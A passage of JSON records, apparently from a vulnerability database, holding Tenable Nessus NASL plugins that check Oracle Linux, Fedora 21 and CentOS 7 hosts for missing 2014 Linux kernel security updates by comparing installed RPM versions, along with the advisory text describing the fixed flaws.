"p-cpe:/a:oracle:linux:mlnx_en-2.6.32-400.36.12.el5uek", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:mlnx_en-2.6.32-400.36.12.el5uekdebug", "p-cpe:/a:oracle:linux:ofa-2.6.32-400.36.12.el5uekdebug", "p-cpe:/a:oracle:linux:mlnx_en-2.6.32-400.36.12.el6uekdebug", "p-cpe:/a:oracle:linux:ofa-2.6.32-400.36.12.el6uek", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:ofa-2.6.32-400.36.12.el5uek", "p-cpe:/a:oracle:linux:ofa-2.6.32-400.36.12.el6uekdebug", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "p-cpe:/a:oracle:linux:mlnx_en-2.6.32-400.36.12.el6uek", "p-cpe:/a:oracle:linux:kernel-uek-headers", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": "ORACLELINUX_ELSA-2014-3105.NASL", "href": "https://www.tenable.com/plugins/nessus/80006", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3105.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80006);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-3184\", \"CVE-2014-3688\", \"CVE-2014-4652\", \"CVE-2014-4656\", \"CVE-2014-6410\");\n script_bugtraq_id(68163, 68170, 69768, 69799, 70768);\n\n script_name(english:\"Oracle Linux 5 / 6 : Unbreakable Enterprise kernel (ELSA-2014-3105)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\nkernel-uek\n[2.6.32-400.36.12.el6uek]\n- HID: fix a couple of off-by-ones (Jiri Kosina) [Orabug: 19849320] \n{CVE-2014-3184}\n- ALSA: control: Protect user controls against concurrent access \n(Lars-Peter Clausen) [Orabug: 20192545] {CVE-2014-4652}\n- udf: Avoid infinite loop when processing indirect ICBs (Jan Kara) \n[Orabug: 20192451] {CVE-2014-6410}\n- ALSA: control: Make sure that id->index does not overflow (Lars-Peter \nClausen) [Orabug: 20192420] {CVE-2014-4656}\n- ALSA: control: Handle numid overflow (Lars-Peter Clausen) [Orabug: \n20192379] {CVE-2014-4656}\n- net: sctp: fix remote memory pressure from excessive queueing (Daniel \nBorkmann) [Orabug: 20192060] {CVE-2014-3688}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-December/004718.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-December/004720.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mlnx_en-2.6.32-400.36.12.el5uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mlnx_en-2.6.32-400.36.12.el5uekdebug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mlnx_en-2.6.32-400.36.12.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mlnx_en-2.6.32-400.36.12.el6uekdebug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ofa-2.6.32-400.36.12.el5uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ofa-2.6.32-400.36.12.el5uekdebug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ofa-2.6.32-400.36.12.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ofa-2.6.32-400.36.12.el6uekdebug\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/07/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2014-3184\", \"CVE-2014-3688\", \"CVE-2014-4652\", \"CVE-2014-4656\", \"CVE-2014-6410\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2014-3105\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"2.6\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-2.6.32\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-2.6.32-400.36.12.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-debug-2.6.32\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-debug-2.6.32-400.36.12.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-debug-devel-2.6.32\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-debug-devel-2.6.32-400.36.12.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-devel-2.6.32\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-devel-2.6.32-400.36.12.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-doc-2.6.32\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-doc-2.6.32-400.36.12.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-firmware-2.6.32\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-firmware-2.6.32-400.36.12.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-headers-2.6.32\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-headers-2.6.32-400.36.12.el5uek\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"mlnx_en-2.6.32-400.36.12.el5uek-1.5.7-2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"mlnx_en-2.6.32-400.36.12.el5uekdebug-1.5.7-2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ofa-2.6.32-400.36.12.el5uek-1.5.1-4.0.58\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ofa-2.6.32-400.36.12.el5uekdebug-1.5.1-4.0.58\")) flag++;\n\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-2.6.32-400.36.12.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-2.6.32-400.36.12.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-devel-2.6.32-400.36.12.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-devel-2.6.32-400.36.12.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-doc-2.6.32-400.36.12.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-firmware-2.6.32-400.36.12.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-headers-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-headers-2.6.32-400.36.12.el6uek\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mlnx_en-2.6.32-400.36.12.el6uek-1.5.7-0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mlnx_en-2.6.32-400.36.12.el6uekdebug-1.5.7-0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ofa-2.6.32-400.36.12.el6uek-1.5.1-4.0.58\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ofa-2.6.32-400.36.12.el6uekdebug-1.5.1-4.0.58\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-12T10:12:03", "description": "Linux v3.16.3. Various bugfixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2014-09-23T00:00:00", "title": "Fedora 21 : kernel-3.16.3-300.fc21 (2014-11097)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3186", "CVE-2014-3181", "CVE-2014-6410"], "modified": "2014-09-23T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:21"], "id": "FEDORA_2014-11097.NASL", "href": "https://www.tenable.com/plugins/nessus/77798", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-11097.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77798);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-3181\", \"CVE-2014-3186\", \"CVE-2014-6410\");\n script_bugtraq_id(69763, 69779, 69799);\n script_xref(name:\"FEDORA\", value:\"2014-11097\");\n\n script_name(english:\"Fedora 21 : kernel-3.16.3-300.fc21 (2014-11097)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Linux v3.16.3. Various bugfixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1141173\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1141407\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1141809\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138194.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?daacb558\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"kernel-3.16.3-300.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:29:54", "description": "Updated kernel packages that fix multiple security issues and several\nbugs are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A flaw was found in the way the Linux kernel's SCTP implementation\nhandled malformed or duplicate Address Configuration Change Chunks\n(ASCONF). A remote attacker could use either of these flaws to crash\nthe system. (CVE-2014-3673, CVE-2014-3687, Important)\n\n* A flaw was found in the way the Linux kernel's SCTP implementation\nhandled the association's output queue. A remote attacker could send\nspecially crafted packets that would cause the system to use an\nexcessive amount of memory, leading to a denial of service.\n(CVE-2014-3688, Important)\n\n* Two flaws were found in the way the Apple Magic Mouse/Trackpad\nmulti-touch driver and the Minibox PicoLCD driver handled invalid HID\nreports. An attacker with physical access to the system could use\nthese flaws to crash the system or, potentially, escalate their\nprivileges on the system. (CVE-2014-3181, CVE-2014-3186, Moderate)\n\n* A memory corruption flaw was found in the way the USB ConnectTech\nWhiteHEAT serial driver processed completion commands sent via USB\nRequest Blocks buffers. An attacker with physical access to the system\ncould use this flaw to crash the system or, potentially, escalate\ntheir privileges on the system. (CVE-2014-3185, Moderate)\n\n* A flaw was found in the way the Linux kernel's keys subsystem\nhandled the termination condition in the associative array garbage\ncollection functionality. A local, unprivileged user could use this\nflaw to crash the system. (CVE-2014-3631, Moderate)\n\n* Multiple flaws were found in the way the Linux kernel's ALSA\nimplementation handled user controls. A local, privileged user could\nuse either of these flaws to crash the system. (CVE-2014-4654,\nCVE-2014-4655, CVE-2014-4656, Moderate)\n\n* A flaw was found in the way the Linux kernel's VFS subsystem handled\nreference counting when performing unmount operations on symbolic\nlinks. A local, unprivileged user could use this flaw to exhaust all\navailable memory on the system or, potentially, trigger a\nuse-after-free error, resulting in a system crash or privilege\nescalation. (CVE-2014-5045, Moderate)\n\n* A flaw was found in the way the get_dumpable() function return value\nwas interpreted in the ptrace subsystem of the Linux kernel. When\n'fs.suid_dumpable' was set to 2, a local, unprivileged local user\ncould use this flaw to bypass intended ptrace restrictions and obtain\npotentially sensitive information. (CVE-2013-2929, Low)\n\n* A stack overflow flaw caused by infinite recursion was found in the\nway the Linux kernel's UDF file system implementation processed\nindirect ICBs. An attacker with physical access to the system could\nuse a specially crafted UDF image to crash the system. (CVE-2014-6410,\nLow)\n\n* An information leak flaw in the way the Linux kernel handled media\ndevice enumerate entities IOCTL requests could allow a local user able\nto access the /dev/media0 device file to leak kernel memory bytes.\n(CVE-2014-1739, Low)\n\n* An out-of-bounds read flaw in the Logitech Unifying receiver driver\ncould allow an attacker with physical access to the system to crash\nthe system or, potentially, escalate their privileges on the system.\n(CVE-2014-3182, Low)\n\n* Multiple out-of-bounds write flaws were found in the way the Cherry\nCymotion keyboard driver, KYE/Genius device drivers, Logitech device\ndrivers, Monterey Genius KB29E keyboard driver, Petalynx Maxter remote\ncontrol driver, and Sunplus wireless desktop driver handled invalid\nHID reports. An attacker with physical access to the system could use\neither of these flaws to write data past an allocated memory buffer.\n(CVE-2014-3184, Low)\n\n* An information leak flaw was found in the RAM Disks Memory Copy\n(rd_mcp) back end driver of the iSCSI Target subsystem could allow a\nprivileged user to leak the contents of kernel memory to an iSCSI\ninitiator remote client. (CVE-2014-4027, Low)\n\n* An information leak flaw in the Linux kernel's ALSA implementation\ncould allow a local, privileged user to leak kernel memory to user\nspace. (CVE-2014-4652, Low)", "edition": 26, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2014-12-15T00:00:00", "title": "CentOS 7 : kernel (CESA-2014:1971)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3182", "CVE-2014-3186", "CVE-2014-4655", "CVE-2014-3673", "CVE-2014-1739", "CVE-2014-3688", "CVE-2013-2929", "CVE-2014-3181", "CVE-2014-3185", "CVE-2014-4027", "CVE-2014-4654", "CVE-2014-5045", "CVE-2014-4656", "CVE-2014-3631", "CVE-2014-4652", "CVE-2014-6410", "CVE-2014-3184", "CVE-2014-3687"], "modified": "2014-12-15T00:00:00", "cpe": ["p-cpe:/a:centos:centos:perf", "p-cpe:/a:centos:centos:python-perf", "p-cpe:/a:centos:centos:kernel-doc", "cpe:/o:centos:centos:7", "p-cpe:/a:centos:centos:kernel-tools-libs-devel", "p-cpe:/a:centos:centos:kernel-tools", "p-cpe:/a:centos:centos:kernel-devel", "p-cpe:/a:centos:centos:kernel", "p-cpe:/a:centos:centos:kernel-debug", "p-cpe:/a:centos:centos:kernel-tools-libs", "p-cpe:/a:centos:centos:kernel-headers", "p-cpe:/a:centos:centos:kernel-abi-whitelists", "p-cpe:/a:centos:centos:kernel-debug-devel"], "id": "CENTOS_RHSA-2014-1971.NASL", "href": "https://www.tenable.com/plugins/nessus/79876", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1971 and \n# CentOS Errata and Security Advisory 2014:1971 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79876);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2013-2929\", \"CVE-2014-1739\", \"CVE-2014-3181\", \"CVE-2014-3182\", \"CVE-2014-3184\", \"CVE-2014-3185\", \"CVE-2014-3186\", \"CVE-2014-3631\", \"CVE-2014-3673\", \"CVE-2014-3687\", \"CVE-2014-3688\", \"CVE-2014-4027\", \"CVE-2014-4652\", \"CVE-2014-4654\", \"CVE-2014-4655\", \"CVE-2014-4656\", \"CVE-2014-5045\", \"CVE-2014-6410\");\n script_bugtraq_id(64111, 68048, 68159, 68162, 68163, 68170, 68862, 69763, 69768, 69770, 69779, 69781, 69799, 70095, 70766, 70768, 70883);\n script_xref(name:\"RHSA\", value:\"2014:1971\");\n\n script_name(english:\"CentOS 7 : kernel (CESA-2014:1971)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Updated kernel packages that fix multiple security issues and several\nbugs are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A flaw was found in the way the Linux kernel's SCTP implementation\nhandled malformed or duplicate Address Configuration Change Chunks\n(ASCONF). A remote attacker could use either of these flaws to crash\nthe system. (CVE-2014-3673, CVE-2014-3687, Important)\n\n* A flaw was found in the way the Linux kernel's SCTP implementation\nhandled the association's output queue. A remote attacker could send\nspecially crafted packets that would cause the system to use an\nexcessive amount of memory, leading to a denial of service.\n(CVE-2014-3688, Important)\n\n* Two flaws were found in the way the Apple Magic Mouse/Trackpad\nmulti-touch driver and the Minibox PicoLCD driver handled invalid HID\nreports. An attacker with physical access to the system could use\nthese flaws to crash the system or, potentially, escalate their\nprivileges on the system. (CVE-2014-3181, CVE-2014-3186, Moderate)\n\n* A memory corruption flaw was found in the way the USB ConnectTech\nWhiteHEAT serial driver processed completion commands sent via USB\nRequest Blocks buffers. An attacker with physical access to the system\ncould use this flaw to crash the system or, potentially, escalate\ntheir privileges on the system. (CVE-2014-3185, Moderate)\n\n* A flaw was found in the way the Linux kernel's keys subsystem\nhandled the termination condition in the associative array garbage\ncollection functionality. A local, unprivileged user could use this\nflaw to crash the system. (CVE-2014-3631, Moderate)\n\n* Multiple flaws were found in the way the Linux kernel's ALSA\nimplementation handled user controls. A local, privileged user could\nuse either of these flaws to crash the system. (CVE-2014-4654,\nCVE-2014-4655, CVE-2014-4656, Moderate)\n\n* A flaw was found in the way the Linux kernel's VFS subsystem handled\nreference counting when performing unmount operations on symbolic\nlinks. A local, unprivileged user could use this flaw to exhaust all\navailable memory on the system or, potentially, trigger a\nuse-after-free error, resulting in a system crash or privilege\nescalation. (CVE-2014-5045, Moderate)\n\n* A flaw was found in the way the get_dumpable() function return value\nwas interpreted in the ptrace subsystem of the Linux kernel. When\n'fs.suid_dumpable' was set to 2, a local, unprivileged local user\ncould use this flaw to bypass intended ptrace restrictions and obtain\npotentially sensitive information. (CVE-2013-2929, Low)\n\n* A stack overflow flaw caused by infinite recursion was found in the\nway the Linux kernel's UDF file system implementation processed\nindirect ICBs. An attacker with physical access to the system could\nuse a specially crafted UDF image to crash the system. (CVE-2014-6410,\nLow)\n\n* An information leak flaw in the way the Linux kernel handled media\ndevice enumerate entities IOCTL requests could allow a local user able\nto access the /dev/media0 device file to leak kernel memory bytes.\n(CVE-2014-1739, Low)\n\n* An out-of-bounds read flaw in the Logitech Unifying receiver driver\ncould allow an attacker with physical access to the system to crash\nthe system or, potentially, escalate their privileges on the system.\n(CVE-2014-3182, Low)\n\n* Multiple out-of-bounds write flaws were found in the way the Cherry\nCymotion keyboard driver, KYE/Genius device drivers, Logitech device\ndrivers, Monterey Genius KB29E keyboard driver, Petalynx Maxter remote\ncontrol driver, and Sunplus wireless desktop driver handled invalid\nHID reports. An attacker with physical access to the system could use\neither of these flaws to write data past an allocated memory buffer.\n(CVE-2014-3184, Low)\n\n* An information leak flaw was found in the RAM Disks Memory Copy\n(rd_mcp) back end driver of the iSCSI Target subsystem could allow a\nprivileged user to leak the contents of kernel memory to an iSCSI\ninitiator remote client. (CVE-2014-4027, Low)\n\n* An information leak flaw in the Linux kernel's ALSA implementation\ncould allow a local, privileged user to leak kernel memory to user\nspace. (CVE-2014-4652, Low)\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2014-December/020820.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0a91b585\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-3673\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", 